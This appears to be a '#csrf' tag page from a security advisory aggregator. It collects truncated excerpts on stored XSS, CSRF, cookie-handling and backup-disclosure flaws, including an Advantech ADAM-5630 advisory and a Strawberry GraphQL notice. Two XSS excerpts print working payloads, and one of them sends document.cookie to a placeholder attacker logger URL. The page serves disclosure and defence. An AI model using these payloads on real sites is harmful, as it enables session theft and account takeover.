#csrf

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Transports" feature allows authenticated users to inject arbitrary JavaScript through the "Details" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. ### Details The vulnerability occurs when creating an alert transport. The application does not properly sanitize the user input in the "Details" field, allowing an attacker to inject and store arbitrary JavaScript. This script is then executed in the context of the page whenever the alert transport is viewed or processed. For instance, the following payload can be used to trigger the XSS: ```test1<script>{onerror=alert}throw 1337</script>``` When the page containing the transport details is loaded, this payload causes the browser to exec...

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. ### Details The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads. For example, the following payload can be used: ```test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie"``` This payload triggers the XSS when the affected page i...

Did you know that over 80% of web applications fail due to poor planning and execution? Now imagine…

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

Simple Responsive Tourism Website version 1.0 suffers from a cross site request forgery vulnerability.

Simple Music Management System version 1.0 suffers from add administrator and cross site request forgery vulnerabilities.

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.5 ATTENTION: Low attack complexity Vendor: Advantech Equipment: ADAM-5630 Vulnerabilities: Use of Persistent Cookies Containing Sensitive Information 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to hijack a legitimate user's session, perform cross-site request forgery, or cause a denial-of-service condition. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Advantech's ADAM are affected: Advantech ADAM-5630: versions prior to v2.5.2 3.2 Vulnerability Overview 3.2.1 USE OF PERSISTENT COOKIES CONTAINING SENSITIVE INFORMATION CWE-539 Cookies of authenticated users remain as active valid cookies when a session is closed. Forging requests with a legitimate cookie, even if the session was terminated, allows an unauthorized attacker to act with the same level of privileges of the legitimate user. CVE-2024-39275 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.0 has been ...

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

Complete Multi Hospital Management System version 1.0 suffers from a backup disclosure vulnerability.

### Impact Multipart file upload support as defined in the [GraphQL multipart request specification](https://github.com/jaydenseric/graphql-multipart-request-spec) was enabled by default in all Strawberry HTTP view integrations. This made all Strawberry HTTP view integrations vulnerable to CSRF attacks if users did not explicitly enable CSRF preventing security mechanism for their servers. Additionally, the Django HTTP view integration, in particular, had an exemption for Django's built-in CSRF protection (i.e., the `CsrfViewMiddleware` middleware) by default. In affect, all Strawberry integrations were vulnerable to CSRF attacks by default. ### Patches Version `v0.243.0` is the first `strawberry-graphql` including a patch. Check out our [documentation](https://strawberry.rocks/docs/breaking-changes/0.243.0) for additional details and upgrade instructions. ### References - [Strawberry upgrade guide](https://strawberry.rocks/docs/breaking-changes/0.243.0) - [Multipart Upload Secur...